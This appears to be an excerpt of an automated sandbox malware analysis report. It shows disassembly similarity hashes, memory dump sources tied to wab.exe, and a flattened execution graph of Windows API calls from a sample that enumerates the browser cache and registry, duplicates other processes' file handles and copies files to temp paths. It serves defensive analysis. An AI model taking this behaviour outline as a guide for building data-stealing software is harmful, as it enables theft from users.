                                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1794362364-0
                                                                                                                                                                                          • Opcode ID: 1e36df4c2fafbaaf20aef69066ce45027c5fc462e7dc814403b346720ba8f8fc
                                                                                                                                                                                          • Instruction ID: 1ebe7d470f040a714ce2cc84efe7265f591690826a72fbaa192392e12b037e36
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e36df4c2fafbaaf20aef69066ce45027c5fc462e7dc814403b346720ba8f8fc
                                                                                                                                                                                          • Instruction Fuzzy Hash: AF01D8B6A01215FB23134AB64D59DBF6E6DDFC2BA4755022EBC84D7302DE64BC0285B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,374D1D66,00000000,00000000,?,374D5C88,374D1D66,00000000,00000000,00000000,?,374D5E85,00000006,FlsSetValue), ref: 374D5D13
                                                                                                                                                                                          • GetLastError.KERNEL32(?,374D5C88,374D1D66,00000000,00000000,00000000,?,374D5E85,00000006,FlsSetValue,374DE190,FlsSetValue,00000000,00000364,?,374D5BC8), ref: 374D5D1F
                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,374D5C88,374D1D66,00000000,00000000,00000000,?,374D5E85,00000006,FlsSetValue,374DE190,FlsSetValue,00000000), ref: 374D5D2D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3177248105-0
                                                                                                                                                                                          • Opcode ID: aedb924b66a3ba7cf119133d1fa3363d87e1b433a55813e1b1dd31962050a9b3
                                                                                                                                                                                          • Instruction ID: 8d9f4af77af3f5eaf2c50ee986e1ece2000a9f2a4bc32253afe1a79b2faa362f
                                                                                                                                                                                          • Opcode Fuzzy Hash: aedb924b66a3ba7cf119133d1fa3363d87e1b433a55813e1b1dd31962050a9b3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C012D36641322EBD7118A288C6DA96B7989F457F1F104610F5B5F7242DF24F402CAF0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetOEMCP.KERNEL32(00000000,?,?,374D6C7C,?), ref: 374D6A1E
                                                                                                                                                                                          • GetACP.KERNEL32(00000000,?,?,374D6C7C,?), ref: 374D6A35
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: |lM7
                                                                                                                                                                                          • API String ID: 0-3154798139
                                                                                                                                                                                          • Opcode ID: 5e32c723154746b1386c2cba7a9bb53e91e2fa6250e8f617c7eaffa54fba4ba6
                                                                                                                                                                                          • Instruction ID: e2c33806f6dc82748b898e6a26760f74cfd46a77fdb7e223f318663bfa4b2c5b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e32c723154746b1386c2cba7a9bb53e91e2fa6250e8f617c7eaffa54fba4ba6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66F08C30850208CBEB01EBA8C4597AC7770BF45379F149388E4A89A6D3EB7578468B42
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:6.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                                          Signature Coverage:1.1%
                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                          Total number of Limit Nodes:82
38738->38739 38740 409d1f 6 API calls 38739->38740 38741 403ee2 38740->38741 38742 409d1f 6 API calls 38741->38742 38743 403efd 38742->38743 38744 409d1f 6 API calls 38743->38744 38745 403f15 38744->38745 38746 403af5 20 API calls 38745->38746 38747 403f29 38746->38747 38748 403af5 20 API calls 38747->38748 38749 403f3a 38748->38749 38750 40414f 33 API calls 38749->38750 38755 403f4f 38750->38755 38751 403faf 39716 40b1ab ??3@YAXPAX ??3@YAXPAX 38751->39716 38752 403f5b memset 38752->38755 38754 403fb7 38754->38410 38755->38751 38755->38752 38756 4099c6 2 API calls 38755->38756 38757 40a8ab 9 API calls 38755->38757 38756->38755 38757->38755 38759 414c2e 16 API calls 38758->38759 38760 403d26 38759->38760 38761 414c2e 16 API calls 38760->38761 38762 403d34 38761->38762 38763 409d1f 6 API calls 38762->38763 38764 403d51 38763->38764 38765 409d1f 6 API calls 38764->38765 38766 403d6c 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 403d84 38767->38768 38769 403af5 20 API calls 38768->38769 38770 403d98 38769->38770 38771 403af5 20 API calls 38770->38771 38772 403da9 38771->38772 38773 40414f 33 API calls 38772->38773 38774 403dbe 38773->38774 38775 403e1e 38774->38775 38777 403dca memset 38774->38777 38779 4099c6 2 API calls 38774->38779 38780 40a8ab 9 API calls 38774->38780 39717 40b1ab ??3@YAXPAX ??3@YAXPAX 38775->39717 38777->38774 38778 403e26 38778->38414 38779->38774 38780->38774 38782 414b81 9 API calls 38781->38782 38783 414c40 38782->38783 38784 414c73 memset 38783->38784 39718 409cea 38783->39718 38785 414c94 38784->38785 39721 414592 RegOpenKeyExW 38785->39721 38789 414c64 38789->38405 38790 414cc1 38791 414cf4 wcscpy 38790->38791 39722 414bb0 wcscpy 38790->39722 38791->38789 38793 414cd2 39723 4145ac RegQueryValueExW 38793->39723 38795 414ce9 RegCloseKey 38795->38791 38797 409d62 38796->38797 38798 409d43 wcscpy 38796->38798 38797->38438 38799 409719 2 API calls 38798->38799 38800 409d51 wcscat 38799->38800 38800->38797 38802 40aebe FindClose 
38801->38802 38803 40ae21 38802->38803 38804 4099c6 2 API calls 38803->38804 38805 40ae35 38804->38805 38806 409d1f 6 API calls 38805->38806 38807 40ae49 38806->38807 38807->38481 38809 40ade0 38808->38809 38810 40ae0f 38808->38810 38809->38810 38811 40ade7 wcscmp 38809->38811 38810->38481 38811->38810 38812 40adfe wcscmp 38811->38812 38812->38810 38814 40ae18 9 API calls 38813->38814 38816 4453c4 38814->38816 38815 40ae51 9 API calls 38815->38816 38816->38815 38817 4453f3 38816->38817 38818 40add4 2 API calls 38816->38818 38821 445403 253 API calls 38816->38821 38819 40aebe FindClose 38817->38819 38818->38816 38820 4453fe 38819->38820 38820->38481 38821->38816 38823 40ae7b FindNextFileW 38822->38823 38824 40ae5c FindFirstFileW 38822->38824 38825 40ae94 38823->38825 38826 40ae8f 38823->38826 38824->38825 38827 409d1f 6 API calls 38825->38827 38829 40aeb6 38825->38829 38828 40aebe FindClose 38826->38828 38827->38829 38828->38825 38829->38481 38830->38413 38831->38467 38832->38448 38833->38448 38834->38482 38836 409c89 38835->38836 38836->38504 38837->38534 38839 413d39 38838->38839 38840 413d2f FreeLibrary 38838->38840 38841 40b633 ??3@YAXPAX 38839->38841 38840->38839 38842 413d42 38841->38842 38843 40b633 ??3@YAXPAX 38842->38843 38844 413d4a 38843->38844 38844->38362 38845->38365 38846->38416 38847->38430 38849 44db70 38848->38849 38850 40b6fc memset 38849->38850 38851 409c70 2 API calls 38850->38851 38852 40b732 wcsrchr 38851->38852 38853 40b743 38852->38853 38854 40b746 memset 38852->38854 38853->38854 38855 40b2cc 27 API calls 38854->38855 38856 40b76f 38855->38856 38857 409d1f 6 API calls 38856->38857 38858 40b783 38857->38858 39724 409b98 GetFileAttributesW 38858->39724 38860 40b792 38861 40b7c2 38860->38861 38862 409c70 2 API calls 38860->38862 39725 40bb98 38861->39725 38864 40b7a5 38862->38864 38866 40b2cc 27 API calls 38864->38866 38870 40b7b2 38866->38870 38867 40b837 FindCloseChangeNotification 38869 40b83e memset 38867->38869 38868 40b817 39777 409a45 
GetTempPathW 38868->39777 39758 40a6e6 WideCharToMultiByte 38869->39758 38873 409d1f 6 API calls 38870->38873 38873->38861 38874 40b827 CopyFileW 38874->38869 38875 40b866 38876 444432 121 API calls 38875->38876 38877 40b879 38876->38877 38878 40bad5 38877->38878 38879 40b273 27 API calls 38877->38879 38880 40baeb 38878->38880 38881 40bade DeleteFileW 38878->38881 38882 40b89a 38879->38882 38883 40b04b ??3@YAXPAX 38880->38883 38881->38880 38884 438552 134 API calls 38882->38884 38885 40baf3 38883->38885 38886 40b8a4 38884->38886 38885->38441 38887 40bacd 38886->38887 38889 4251c4 137 API calls 38886->38889 38888 443d90 111 API calls 38887->38888 38888->38878 38912 40b8b8 38889->38912 38890 40bac6 39784 424f26 123 API calls 38890->39784 38891 40b8bd memset 39759 425413 38891->39759 38894 425413 17 API calls 38894->38912 38897 40a71b MultiByteToWideChar 38897->38912 38898 40a734 MultiByteToWideChar 38898->38912 38899 4253af 17 API calls 38899->38912 38900 4253cf 17 API calls 38900->38912 38901 40b9b5 memcmp 38901->38912 38902 4099c6 2 API calls 38902->38912 38903 404423 37 API calls 38903->38912 38906 40bb3e memset memcpy 39785 40a734 MultiByteToWideChar 38906->39785 38907 4251c4 137 API calls 38907->38912 38909 40bb88 LocalFree 38909->38912 38912->38890 38912->38891 38912->38894 38912->38897 38912->38898 38912->38899 38912->38900 38912->38901 38912->38902 38912->38903 38912->38906 38912->38907 38913 40ba5f memcmp 38912->38913 38914 4099f4 3 API calls 38912->38914 39766 4253ef 38912->39766 39771 40b64c 38912->39771 39780 447280 memset 38912->39780 39781 447960 memset memcpy memcpy memcpy 38912->39781 39782 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38912->39782 39783 447920 memcpy memcpy memcpy 38912->39783 38913->38912 38914->38912 38915->38443 38917 40aed1 38916->38917 38918 40aec7 FindClose 38916->38918 38917->38375 38918->38917 38920 4099d7 38919->38920 38921 4099da memcpy 38919->38921 38920->38921 38921->38426 38923 40b2cc 27 API calls 38922->38923 38924 44543f 
38923->38924 38925 409d1f 6 API calls 38924->38925 38926 44544f 38925->38926 39878 409b98 GetFileAttributesW 38926->39878 38928 44545e 38929 445476 38928->38929 38930 40b6ef 252 API calls 38928->38930 38931 40b2cc 27 API calls 38929->38931 38930->38929 38932 445482 38931->38932 38933 409d1f 6 API calls 38932->38933 38934 445492 38933->38934 39879 409b98 GetFileAttributesW 38934->39879 38936 4454a1 38937 4454b9 38936->38937 38938 40b6ef 252 API calls 38936->38938 38937->38456 38938->38937 38939->38455 38940->38472 38941->38478 38942->38515 38943->38493 38944->38542 38945->38542 38946->38525 38947->38553 38948->38555 38949->38557 38951 414c2e 16 API calls 38950->38951 38952 40c2ae 38951->38952 39022 40c1d3 38952->39022 38957 40c3be 38974 40a8ab 38957->38974 38958 40afcf 2 API calls 38959 40c2fd FindFirstUrlCacheEntryW 38958->38959 38960 40c3b6 38959->38960 38961 40c31e wcschr 38959->38961 38962 40b04b ??3@YAXPAX 38960->38962 38963 40c331 38961->38963 38964 40c35e FindNextUrlCacheEntryW 38961->38964 38962->38957 38965 40a8ab 9 API calls 38963->38965 38964->38961 38966 40c373 GetLastError 38964->38966 38969 40c33e wcschr 38965->38969 38967 40c3ad FindCloseUrlCache 38966->38967 38968 40c37e 38966->38968 38967->38960 38970 40afcf 2 API calls 38968->38970 38969->38964 38971 40c34f 38969->38971 38972 40c391 FindNextUrlCacheEntryW 38970->38972 38973 40a8ab 9 API calls 38971->38973 38972->38961 38972->38967 38973->38964 39138 40a97a 38974->39138 38977 40a8cc 38977->38564 38978 40a8d0 7 API calls 38978->38977 39143 40b1ab ??3@YAXPAX ??3@YAXPAX 38979->39143 38981 40c3dd 38982 40b2cc 27 API calls 38981->38982 38983 40c3e7 38982->38983 39144 414592 RegOpenKeyExW 38983->39144 38985 40c3f4 38986 40c50e 38985->38986 38987 40c3ff 38985->38987 39001 405337 38986->39001 38988 40a9ce 4 API calls 38987->38988 38989 40c418 memset 38988->38989 39145 40aa1d 38989->39145 38992 40c471 38994 40c47a _wcsupr 38992->38994 38993 40c505 RegCloseKey 38993->38986 38995 40a8d0 7 API calls 
38994->38995 38996 40c498 38995->38996 38997 40a8d0 7 API calls 38996->38997 38998 40c4ac memset 38997->38998 38999 40aa1d 38998->38999 39000 40c4e4 RegEnumValueW 38999->39000 39000->38993 39000->38994 39147 405220 39001->39147 39005 4099c6 2 API calls 39004->39005 39006 40a714 _wcslwr 39005->39006 39007 40c634 39006->39007 39204 405361 39007->39204 39010 40c65c wcslen 39207 4053b6 39 API calls 39010->39207 39011 40c71d wcslen 39011->38571 39013 40c677 39014 40c713 39013->39014 39208 40538b 39 API calls 39013->39208 39210 4053df 39 API calls 39014->39210 39017 40c6a5 39017->39014 39018 40c6a9 memset 39017->39018 39019 40c6d3 39018->39019 39209 40c589 43 API calls 39019->39209 39021->38572 39023 40ae18 9 API calls 39022->39023 39029 40c210 39023->39029 39024 40ae51 9 API calls 39024->39029 39025 40c264 39026 40aebe FindClose 39025->39026 39028 40c26f 39026->39028 39027 40add4 2 API calls 39027->39029 39034 40e5ed memset memset 39028->39034 39029->39024 39029->39025 39029->39027 39030 40c231 _wcsicmp 39029->39030 39031 40c1d3 35 API calls 39029->39031 39030->39029 39032 40c248 39030->39032 39031->39029 39047 40c084 22 API calls 39032->39047 39035 414c2e 16 API calls 39034->39035 39036 40e63f 39035->39036 39037 409d1f 6 API calls 39036->39037 39038 40e658 39037->39038 39048 409b98 GetFileAttributesW 39038->39048 39040 40e667 39041 409d1f 6 API calls 39040->39041 39043 40e680 39040->39043 39041->39043 39049 409b98 GetFileAttributesW 39043->39049 39044 40e68f 39045 40c2d8 39044->39045 39050 40e4b2 39044->39050 39045->38957 39045->38958 39047->39029 39048->39040 39049->39044 39071 40e01e 39050->39071 39052 40e593 39053 40e5b0 39052->39053 39054 40e59c DeleteFileW 39052->39054 39055 40b04b ??3@YAXPAX 39053->39055 39054->39053 39057 40e5bb 39055->39057 39056 40e521 39056->39052 39094 40e175 39056->39094 39059 40e5c4 CloseHandle 39057->39059 39060 40e5cc 39057->39060 39059->39060 39062 40b633 ??3@YAXPAX 39060->39062 39061 40e573 39063 40e584 39061->39063 39064 40e57c 
FindCloseChangeNotification 39061->39064 39065 40e5db 39062->39065 39137 40b1ab ??3@YAXPAX ??3@YAXPAX 39063->39137 39064->39063 39068 40b633 ??3@YAXPAX 39065->39068 39067 40e540 39067->39061 39114 40e2ab 39067->39114 39069 40e5e3 39068->39069 39069->39045 39072 406214 22 API calls 39071->39072 39073 40e03c 39072->39073 39074 40e16b 39073->39074 39075 40dd85 74 API calls 39073->39075 39074->39056 39076 40e06b 39075->39076 39076->39074 39077 40afcf ??2@YAPAXI ??3@YAXPAX 39076->39077 39078 40e08d OpenProcess 39077->39078 39079 40e0a4 GetCurrentProcess DuplicateHandle 39078->39079 39083 40e152 39078->39083 39080 40e0d0 GetFileSize 39079->39080 39081 40e14a CloseHandle 39079->39081 39084 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39080->39084 39081->39083 39082 40e160 39086 40b04b ??3@YAXPAX 39082->39086 39083->39082 39085 406214 22 API calls 39083->39085 39087 40e0ea 39084->39087 39085->39082 39086->39074 39088 4096dc CreateFileW 39087->39088 39089 40e0f1 CreateFileMappingW 39088->39089 39090 40e140 CloseHandle CloseHandle 39089->39090 39091 40e10b MapViewOfFile 39089->39091 39090->39081 39092 40e13b FindCloseChangeNotification 39091->39092 39093 40e11f WriteFile UnmapViewOfFile 39091->39093 39092->39090 39093->39092 39095 40e18c 39094->39095 39096 406b90 11 API calls 39095->39096 39097 40e19f 39096->39097 39098 40e1a7 memset 39097->39098 39099 40e299 39097->39099 39104 40e1e8 39098->39104 39100 4069a3 ??3@YAXPAX ??3@YAXPAX 39099->39100 39101 40e2a4 39100->39101 39101->39067 39102 406e8f 13 API calls 39102->39104 39103 406b53 SetFilePointerEx ReadFile 39103->39104 39104->39102 39104->39103 39105 40e283 39104->39105 39106 40dd50 _wcsicmp 39104->39106 39110 40742e 8 API calls 39104->39110 39111 40aae3 wcslen wcslen _memicmp 39104->39111 39112 40e244 _snwprintf 39104->39112 39107 40e291 39105->39107 39108 40e288 ??3@YAXPAX 39105->39108 39106->39104 39109 40aa04 ??3@YAXPAX 39107->39109 39108->39107 39109->39099 39110->39104 39111->39104 39113 40a8d0 7 API 
calls 39112->39113 39113->39104 39115 40e2c2 39114->39115 39116 406b90 11 API calls 39115->39116 39127 40e2d3 39116->39127 39117 40e4a0 39118 4069a3 ??3@YAXPAX ??3@YAXPAX 39117->39118 39120 40e4ab 39118->39120 39119 406e8f 13 API calls 39119->39127 39120->39067 39121 406b53 SetFilePointerEx ReadFile 39121->39127 39122 40e489 39123 40aa04 ??3@YAXPAX 39122->39123 39125 40e491 39123->39125 39124 40dd50 _wcsicmp 39124->39127 39125->39117 39126 40e497 ??3@YAXPAX 39125->39126 39126->39117 39127->39117 39127->39119 39127->39121 39127->39122 39127->39124 39128 40dd50 _wcsicmp 39127->39128 39131 40742e 8 API calls 39127->39131 39132 40e3e0 memcpy 39127->39132 39133 40e3b3 wcschr 39127->39133 39134 40e3fb memcpy 39127->39134 39135 40e416 memcpy 39127->39135 39136 40e431 memcpy 39127->39136 39129 40e376 memset 39128->39129 39130 40aa29 6 API calls 39129->39130 39130->39127 39131->39127 39132->39127 39133->39127 39134->39127 39135->39127 39136->39127 39137->39052 39140 40a980 39138->39140 39139 40a8bb 39139->38977 39139->38978 39140->39139 39141 40a995 _wcsicmp 39140->39141 39142 40a99c wcscmp 39140->39142 39141->39140 39142->39140 39143->38981 39144->38985 39146 40aa23 RegEnumValueW 39145->39146 39146->38992 39146->38993 39148 405335 39147->39148 39149 40522a 39147->39149 39148->38571 39150 40b2cc 27 API calls 39149->39150 39151 405234 39150->39151 39152 40a804 8 API calls 39151->39152 39153 40523a 39152->39153 39192 40b273 39153->39192 39155 405248 _mbscpy _mbscat GetProcAddress 39156 40b273 27 API calls 39155->39156 39157 405279 39156->39157 39195 405211 GetProcAddress 39157->39195 39159 405282 39160 40b273 27 API calls 39159->39160 39161 40528f 39160->39161 39196 405211 GetProcAddress 39161->39196 39163 405298 39164 40b273 27 API calls 39163->39164 39165 4052a5 39164->39165 39197 405211 GetProcAddress 39165->39197 39167 4052ae 39168 40b273 27 API calls 39167->39168 39169 4052bb 39168->39169 39198 405211 GetProcAddress 39169->39198 39171 4052c4 39172 40b273 27 API calls 
39171->39172 39173 4052d1 39172->39173 39199 405211 GetProcAddress 39173->39199 39175 4052da 39176 40b273 27 API calls 39175->39176 39177 4052e7 39176->39177 39200 405211 GetProcAddress 39177->39200 39179 4052f0 39180 40b273 27 API calls 39179->39180 39181 4052fd 39180->39181 39201 405211 GetProcAddress 39181->39201 39183 405306 39184 40b273 27 API calls 39183->39184 39185 405313 39184->39185 39202 405211 GetProcAddress 39185->39202 39187 40531c 39188 40b273 27 API calls 39187->39188 39189 405329 39188->39189 39203 405211 GetProcAddress 39189->39203 39191 405332 39191->39148 39193 40b58d 27 API calls 39192->39193 39194 40b18c 39193->39194 39194->39155 39195->39159 39196->39163 39197->39167 39198->39171 39199->39175 39200->39179 39201->39183 39202->39187 39203->39191 39205 405220 39 API calls 39204->39205 39206 405369 39205->39206 39206->39010 39206->39011 39207->39013 39208->39017 39209->39014 39210->39011 39212 40440c FreeLibrary 39211->39212 39213 40436d 39212->39213 39214 40a804 8 API calls 39213->39214 39215 404377 39214->39215 39216 404383 39215->39216 39217 404405 39215->39217 39218 40b273 27 API calls 39216->39218 39217->38583 39217->38585 39217->38586 39219 40438d GetProcAddress 39218->39219 39220 40b273 27 API calls 39219->39220 39221 4043a7 GetProcAddress 39220->39221 39222 40b273 27 API calls 39221->39222 39223 4043ba GetProcAddress 39222->39223 39224 40b273 27 API calls 39223->39224 39225 4043ce GetProcAddress 39224->39225 39226 40b273 27 API calls 39225->39226 39227 4043e2 GetProcAddress 39226->39227 39228 4043f1 39227->39228 39229 4043f7 39228->39229 39230 40440c FreeLibrary 39228->39230 39229->39217 39230->39217 39232 404413 FreeLibrary 39231->39232 39233 40441e 39231->39233 39232->39233 39233->38600 39234->38591 39236 40447e 39235->39236 39237 40442e 39235->39237 39236->38591 39238 40b2cc 27 API calls 39237->39238 39239 404438 39238->39239 39240 40a804 8 API calls 39239->39240 39241 40443e 39240->39241 39242 404445 39241->39242 39243 404467 
39241->39243 39244 40b273 27 API calls 39242->39244 39243->39236 39245 404475 FreeLibrary 39243->39245 39246 40444f GetProcAddress 39244->39246 39245->39236 39246->39243 39247 404460 39246->39247 39247->39243 39249 4135f6 39248->39249 39250 4135eb FreeLibrary 39248->39250 39249->38603 39250->39249 39252 4449c4 39251->39252 39253 444a52 39251->39253 39254 40b2cc 27 API calls 39252->39254 39253->38620 39253->38621 39255 4449cb 39254->39255 39256 40a804 8 API calls 39255->39256 39257 4449d1 39256->39257 39258 40b273 27 API calls 39257->39258 39259 4449dc GetProcAddress 39258->39259 39260 40b273 27 API calls 39259->39260 39261 4449f3 GetProcAddress 39260->39261 39262 40b273 27 API calls 39261->39262 39263 444a04 GetProcAddress 39262->39263 39264 40b273 27 API calls 39263->39264 39265 444a15 GetProcAddress 39264->39265 39266 40b273 27 API calls 39265->39266 39267 444a26 GetProcAddress 39266->39267 39268 40b273 27 API calls 39267->39268 39269 444a37 GetProcAddress 39268->39269 39270 40b273 27 API calls 39269->39270 39271 444a48 GetProcAddress 39270->39271 39271->39253 39272->38631 39273->38631 39274->38631 39275->38631 39276->38622 39278 403a29 39277->39278 39292 403bed memset memset 39278->39292 39280 403ae7 39305 40b1ab ??3@YAXPAX ??3@YAXPAX 39280->39305 39281 403a3f memset 39287 403a2f 39281->39287 39283 403aef 39283->38638 39284 409b98 GetFileAttributesW 39284->39287 39285 40a8d0 7 API calls 39285->39287 39286 409d1f 6 API calls 39286->39287 39287->39280 39287->39281 39287->39284 39287->39285 39287->39286 39289 40a051 GetFileTime FindCloseChangeNotification 39288->39289 39290 4039ca CompareFileTime 39288->39290 39289->39290 39290->38638 39291->38639 39293 414c2e 16 API calls 39292->39293 39294 403c38 39293->39294 39295 409719 2 API calls 39294->39295 39296 403c3f wcscat 39295->39296 39297 414c2e 16 API calls 39296->39297 39298 403c61 39297->39298 39299 409719 2 API calls 39298->39299 39300 403c68 wcscat 39299->39300 39306 403af5 39300->39306 39303 403af5 20 API calls 
39304 403c95 39303->39304 39304->39287 39305->39283 39307 403b02 39306->39307 39308 40ae18 9 API calls 39307->39308 39316 403b37 39308->39316 39309 403bdb 39311 40aebe FindClose 39309->39311 39310 40add4 wcscmp wcscmp 39310->39316 39312 403be6 39311->39312 39312->39303 39313 40ae18 9 API calls 39313->39316 39314 40ae51 9 API calls 39314->39316 39315 40aebe FindClose 39315->39316 39316->39309 39316->39310 39316->39313 39316->39314 39316->39315 39317 40a8d0 7 API calls 39316->39317 39317->39316 39319 409d1f 6 API calls 39318->39319 39320 404190 39319->39320 39333 409b98 GetFileAttributesW 39320->39333 39322 40419c 39323 4041a7 6 API calls 39322->39323 39324 40435c 39322->39324 39325 40424f 39323->39325 39324->38665 39325->39324 39327 40425e memset 39325->39327 39329 409d1f 6 API calls 39325->39329 39330 40a8ab 9 API calls 39325->39330 39334 414842 39325->39334 39327->39325 39328 404296 wcscpy 39327->39328 39328->39325 39329->39325 39331 4042b6 memset memset _snwprintf wcscpy 39330->39331 39331->39325 39332->38663 39333->39322 39337 41443e 39334->39337 39336 414866 39336->39325 39338 41444b 39337->39338 39339 414451 39338->39339 39340 4144a3 GetPrivateProfileStringW 39338->39340 39341 414491 39339->39341 39342 414455 wcschr 39339->39342 39340->39336 39344 414495 WritePrivateProfileStringW 39341->39344 39342->39341 39343 414463 _snwprintf 39342->39343 39343->39344 39344->39336 39345->38669 39347 40b2cc 27 API calls 39346->39347 39348 409615 39347->39348 39349 409d1f 6 API calls 39348->39349 39350 409625 39349->39350 39375 409b98 GetFileAttributesW 39350->39375 39352 409634 39353 409648 39352->39353 39376 4091b8 memset 39352->39376 39355 40b2cc 27 API calls 39353->39355 39357 408801 39353->39357 39356 40965d 39355->39356 39358 409d1f 6 API calls 39356->39358 39357->38672 39357->38673 39359 40966d 39358->39359 39428 409b98 GetFileAttributesW 39359->39428 39361 40967c 39361->39357 39362 409681 39361->39362 39429 409529 72 API calls 39362->39429 39364 409690 39364->39357 
39365->38695 39375->39352 39430 40a6e6 WideCharToMultiByte 39376->39430 39378 409202 39431 444432 39378->39431 39381 40b273 27 API calls 39382 409236 39381->39382 39477 438552 39382->39477 39385 409383 39387 40b273 27 API calls 39385->39387 39389 409399 39387->39389 39391 438552 134 API calls 39389->39391 39409 4093a3 39391->39409 39395 4094ff 39480 443d90 39395->39480 39398 4251c4 137 API calls 39398->39409 39400 409507 39408 40951d 39400->39408 39402 4093df 39533 424f26 123 API calls 39402->39533 39406 4253cf 17 API calls 39406->39409 39408->39353 39409->39395 39409->39398 39409->39402 39409->39406 39411 4093e4 39409->39411 39415 4253af 17 API calls 39411->39415 39418 4093ed 39415->39418 39420 4253af 17 API calls 39418->39420 39428->39361 39429->39364 39430->39378 39432 4438b5 11 API calls 39431->39432 39433 44444c 39432->39433 39439 409215 39433->39439 39535 415a6d 39433->39535 39435 4442e6 11 API calls 39437 44469e 39435->39437 39436 444486 39438 4444b9 memcpy 39436->39438 39476 4444a4 39436->39476 39437->39439 39441 443d90 111 API calls 39437->39441 39539 415258 39438->39539 39439->39381 39439->39408 39441->39439 39442 444524 39443 444541 39442->39443 39444 44452a 39442->39444 39542 444316 39443->39542 39445 416935 16 API calls 39444->39445 39445->39476 39448 444316 18 API calls 39449 444563 39448->39449 39450 444316 18 API calls 39449->39450 39451 44456f 39450->39451 39452 444316 18 API calls 39451->39452 39476->39435 39609 438460 39477->39609 39479 409240 39479->39385 39500 4251c4 39479->39500 39481 443da3 39480->39481 39482 443db6 39480->39482 39621 41707a 39481->39621 39482->39400 39637 424f07 39500->39637 39502 4251e4 39503 4251f7 39502->39503 39504 4251e8 39502->39504 39645 4250f8 39503->39645 39644 4446ea 11 API calls 39504->39644 39506 4251f2 39533->39395 39536 415a77 39535->39536 39537 415a8d 39536->39537 39538 415a7e memset 39536->39538 39537->39436 39538->39537 39540 4438b5 11 API calls 39539->39540 39541 41525d 39540->39541 39541->39442 39543 
444328 39542->39543 39544 444423 39543->39544 39545 44434e 39543->39545 39547 4446ea 11 API calls 39544->39547 39546 432d4e memset memset memcpy 39545->39546 39548 44435a 39546->39548 39553 444381 39547->39553 39550 444375 39548->39550 39555 44438b 39548->39555 39549 432d4e memset memset memcpy 39551 4443ec 39549->39551 39552 416935 16 API calls 39550->39552 39551->39553 39554 416935 16 API calls 39551->39554 39552->39553 39553->39448 39554->39553 39555->39549 39610 41703f 11 API calls 39609->39610 39611 43847a 39610->39611 39612 43848a 39611->39612 39613 43847e 39611->39613 39615 438270 134 API calls 39612->39615 39614 4446ea 11 API calls 39613->39614 39617 438488 39614->39617 39616 4384aa 39615->39616 39616->39617 39618 424f26 123 API calls 39616->39618 39617->39479 39619 4384bb 39618->39619 39620 438270 134 API calls 39619->39620 39620->39617 39638 424f1f 39637->39638 39639 424f0c 39637->39639 39641 424eea 11 API calls 39638->39641 39640 416760 11 API calls 39639->39640 39642 424f18 39640->39642 39643 424f24 39641->39643 39642->39502 39643->39502 39644->39506 39708 413f4f 39681->39708 39684 413f37 K32GetModuleFileNameExW 39685 413f4a 39684->39685 39685->38731 39687 413969 wcscpy 39686->39687 39688 41396c wcschr 39686->39688 39700 413a3a 39687->39700 39688->39687 39690 41398e 39688->39690 39713 4097f7 wcslen wcslen _memicmp 39690->39713 39692 41399a 39693 4139a4 memset 39692->39693 39694 4139e6 39692->39694 39714 409dd5 GetWindowsDirectoryW wcscpy 39693->39714 39695 413a31 wcscpy 39694->39695 39696 4139ec memset 39694->39696 39695->39700 39715 409dd5 GetWindowsDirectoryW wcscpy 39696->39715 39698 4139c9 wcscpy wcscat 39698->39700 39700->38731 39701 413a11 memcpy wcscat 39701->39700 39703 413cb0 GetModuleHandleW 39702->39703 39704 413cda 39702->39704 39703->39704 39705 413cbf GetProcAddress 39703->39705 39706 413ce3 GetProcessTimes 39704->39706 39707 413cf6 39704->39707 39705->39704 39706->38734 39707->38734 39709 413f2f 39708->39709 39710 413f54 39708->39710 
